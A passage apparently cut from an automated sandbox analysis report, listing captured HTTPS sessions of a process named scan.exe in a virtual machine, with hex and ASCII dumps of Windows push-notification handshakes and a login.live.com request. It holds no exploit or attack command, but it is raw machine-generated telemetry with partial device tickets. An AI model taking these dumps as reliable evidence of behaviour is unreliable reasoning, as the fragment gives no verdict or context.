                                                                                                          2022-08-13 07:08:05 UTC224OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:08:05 UTC225OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 34 31 35 33 65 62 66 30 62 34 66 63 62 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: bc4153ebf0b4fcbf<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:08:05 UTC226OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 34 31 35 33 65 62 66 30 62 34 66 63 62 66 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: bc4153ebf0b4fcbf
                                                                                                          2022-08-13 07:08:05 UTC226INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:08:05 UTC226INData Raw: 4d 53 2d 43 56 3a 20 72 68 6e 68 75 56 5a 46 4e 6b 57 67 4c 4c 54 7a 43 6e 6d 58 37 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: rhnhuVZFNkWgLLTzCnmX7A.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          24192.168.2.74981220.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:08:22 UTC226OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 63 32 30 66 38 37 33 34 66 30 62 64 65 61 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 71c20f8734f0bdea
                                                                                                          2022-08-13 07:08:22 UTC226OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:08:22 UTC226OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 63 32 30 66 38 37 33 34 66 30 62 64 65 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 71c20f8734f0bdea<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:08:22 UTC227OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 63 32 30 66 38 37 33 34 66 30 62 64 65 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: 71c20f8734f0bdea<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:08:22 UTC227INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:08:22 UTC227INData Raw: 4d 53 2d 43 56 3a 20 52 6c 75 33 33 6c 46 39 69 55 6d 4c 51 47 7a 61 59 7a 64 53 4c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: Rlu33lF9iUmLQGzaYzdSLg.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          25192.168.2.74981320.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:08:30 UTC227OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 63 33 30 32 61 38 61 39 39 62 34 33 39 64 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 2dc302a8a99b439d
                                                                                                          2022-08-13 07:08:30 UTC227OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:08:30 UTC227OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 63 33 30 32 61 38 61 39 39 62 34 33 39 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 2dc302a8a99b439d<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:08:30 UTC229OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 64 63 33 30 32 61 38 61 39 39 62 34 33 39 64 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: 2dc302a8a99b439d
                                                                                                          2022-08-13 07:08:30 UTC229INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:08:30 UTC229INData Raw: 4d 53 2d 43 56 3a 20 78 2f 39 6c 6c 53 42 7a 55 6b 47 66 59 4a 52 64 6d 78 58 38 6f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: x/9llSBzUkGfYJRdmxX8oQ.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          26192.168.2.74981420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:09:02 UTC229OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 39 33 32 33 31 38 36 61 61 61 36 63 64 66 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: eb9323186aaa6cdf
                                                                                                          2022-08-13 07:09:02 UTC229OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:09:02 UTC229OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 39 33 32 33 31 38 36 61 61 61 36 63 64 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: eb9323186aaa6cdf<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:09:02 UTC230OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 39 33 32 33 31 38 36 61 61 61 36 63 64 66 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: eb9323186aaa6cdf
                                                                                                          2022-08-13 07:09:02 UTC231INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:09:02 UTC231INData Raw: 4d 53 2d 43 56 3a 20 72 36 34 7a 61 57 49 6e 4e 30 53 69 58 2f 71 37 59 6a 70 6e 4e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: r64zaWInN0SiX/q7YjpnNg.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          27192.168.2.74981520.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:09:05 UTC231OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 65 38 34 34 33 65 34 35 31 61 39 30 66 39 32 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: fe8443e451a90f92
                                                                                                          2022-08-13 07:09:05 UTC231OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:09:05 UTC231OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 65 38 34 34 33 65 34 35 31 61 39 30 66 39 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: fe8443e451a90f92<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:09:05 UTC232OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 65 38 34 34 33 65 34 35 31 61 39 30 66 39 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: fe8443e451a90f92<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:09:05 UTC232INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:09:05 UTC232INData Raw: 4d 53 2d 43 56 3a 20 62 72 30 34 59 2b 51 6e 59 55 47 66 59 6d 78 45 61 4c 30 70 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: br04Y+QnYUGfYmxEaL0pGg.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          28192.168.2.74981620.199.120.85443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:09:42 UTC233OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 64 37 61 61 38 39 63 63 30 63 39 31 36 35 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 6cd7aa89cc0c9165
                                                                                                          2022-08-13 07:09:42 UTC233OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:09:42 UTC233OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 64 37 61 61 38 39 63 63 30 63 39 31 36 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 6cd7aa89cc0c9165<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:09:42 UTC234OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 64 37 61 61 38 39 63 63 30 63 39 31 36 35 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: 6cd7aa89cc0c9165
                                                                                                          2022-08-13 07:09:42 UTC234INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:09:42 UTC234INData Raw: 4d 53 2d 43 56 3a 20 6e 74 41 70 34 52 73 49 68 45 32 49 77 32 79 52 49 34 38 38 6c 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: ntAp4RsIhE2Iw2yRI488lw.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.74976620.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:09 UTC72OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 4740
                                                                                                          Host: login.live.com
